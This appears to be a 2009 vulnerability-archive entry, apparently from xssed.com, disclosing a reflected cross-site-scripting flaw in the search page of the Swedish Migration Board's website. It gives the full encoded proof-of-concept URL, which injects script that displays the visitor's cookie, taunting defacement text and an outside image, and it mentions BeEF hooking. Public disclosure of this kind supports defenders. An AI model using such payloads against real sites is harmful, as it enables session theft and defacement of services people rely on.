Security researcher DellNull, has submitted on 15/05/2009 a cross-site-scripting (XSS) vulnerability affecting www.migrationsverket.se, which at the time of submission ranked 87049 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 11/06/2009. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
| Date submitted: 15/05/2009 |
Date published: 11/06/2009 |
Fixed? Mail us! | Status:  UNFIXED |
| Author: DellNull |
Domain: www.migrationsverket.se |
Category: XSS |
Pagerank: 87049 |
|---|
URL: http://www.migrationsverket.se/java/search.jsp?query=%3CSCRIPT%3Ealert(%27This+is+a+cookie+from+the+
Swedish+Migration+Board!\n%27%2Bdocument.cookie)%3B%3C%2Fscript%3E%3Cfont+color%3D%22red%22+size%3D%
22-1%22%3EThe+Swedish+Migration+Board!+%3Cbr%3E+Yeah%2C+that%27s+right%2C+don%27t+spend+money+on+sec
urity+%2C+see+%3Ca+href+%3D%27http%3A%2F%2Fxssed.com%2Fsearch%3Fkey%3Dmigrationsverket.se%27%3Ehttp%
3A%2F%2Fxssed.com%2Fsearch%3Fkey%3Dmigrationsverket.se%3C%2Fa%3E+It%27s+a+shame+that+a+government+au
thority+is+prone+to+security+flaws+in+their+systems!+What+if+someone+places+a+xss+proxy+hook+(like+B
eEF)+here%3F+The+privacy+for+citizens+is+supposed+to+be+protected+by+constitutional+laws.+So+live+by
+the+law+or+die+by+the+law%3Cbr%3E%3Cbr%3E-+DellNull%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cimg+src%3D%27http%3A%
2F%2Fwww.clipartguide.com%2F_named_clipart_images%2F0511-0809-2903-2813_Cartoon_African_American_Fam
ily_Grocery_Shopping_clipart_image.jpg%27%3E%3C%2Ffont%3E&x=23&y=9 |
|
Click here to view the mirror
|
|
|
| 
